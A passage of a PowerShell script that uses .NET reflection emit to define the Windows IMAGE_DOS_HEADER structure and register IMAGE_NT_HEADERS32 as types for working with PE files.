$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
#Struct IMAGE_DOS_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
$e_resField.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null